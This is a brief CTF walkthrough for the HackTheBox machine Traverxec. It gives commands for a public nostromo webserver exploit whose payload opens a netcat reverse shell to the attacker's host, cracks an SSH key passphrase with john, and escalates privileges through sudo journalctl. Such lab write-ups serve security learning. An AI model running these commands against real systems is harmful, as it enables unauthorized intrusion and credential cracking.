Traverxec @ HackTheBox

11Apr

Traverxec @ HackTheBox

By CTF , , , ,

Traverxec is a 20-point machine on hackthebox that involves using a public exploit on the nostromo webserver, cracking the passphrase of an ssh private key and abusing a sudo entry for journalctl.

Notes

Nostromo exploit:

searchsploit nostromo
searchsploit -m exploits/multiple/remote/47837.py
python 47837.py traverxec.htb 80 "nc <ip> 7000 -e /bin/sh"

Cracking the private key:

ssh2john.py ./david.key | tee david.hash
john -w=rockyou.txt david.hash

Exploiting journalctl:

stty rows 2
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

Share this post

Author

Related Posts

16Dec

TMHCxHTB Matrix Madness

Using the hill cipher cracking theorem to solve the ctf challenge. read more

01May

.NET Remoting & WCF – Sharp @ HackTheBox

We will solve Sharp, a 40-point machine on HackTheBox that is all about C-Sharp & .Net. For user, we exploit... read more

22Jan

SSRF & Python Debugger – Forge @ HackTheBox

We are solving Forge, a medium difficulty Linux machine on HackTheBox which involves an SSRF & playing with the python... read more

25May

Luke @ HackTheBox

Luke is a rather short, easy machine on hackthebox, which was nonetheless fun to solve and our team got both... read more

27Jun

Player2 @ HackTheBox

Player2 is a 50-point Linux machine on HackTheBox. For user we do some web fuzzing, call a twirp method to... read more

16Feb

Giddy @ HackTheBox

In this post I will give a quick walkthrough on Giddy from hackthebox.eu. The machine involves (automated) sql injection, stealing... read more

08Feb

Ypuffy @ HackTheBox

Ypuffy is a rather unique machine on hackthebox.eu because it features OpenBSD as operating system. In my version of getting... read more

15May

Ghoul @ HackTheBox

Ghoul is a nice 40 points machine on hackthebox involving zip traversal, lateral movement, public exploits and some obscure hidden... read more

06Jun

Nest @ HackTheBox

Nest is a 20-point Windows machine on HackTheBox that involves searching through smb shares and analyzing 2 short custom programs. read more

11Jul

Book @ HackTheBox

Book is a 30-point Linux machine on HackTheBox. We log into a web application by exploiting SQL truncation and then... read more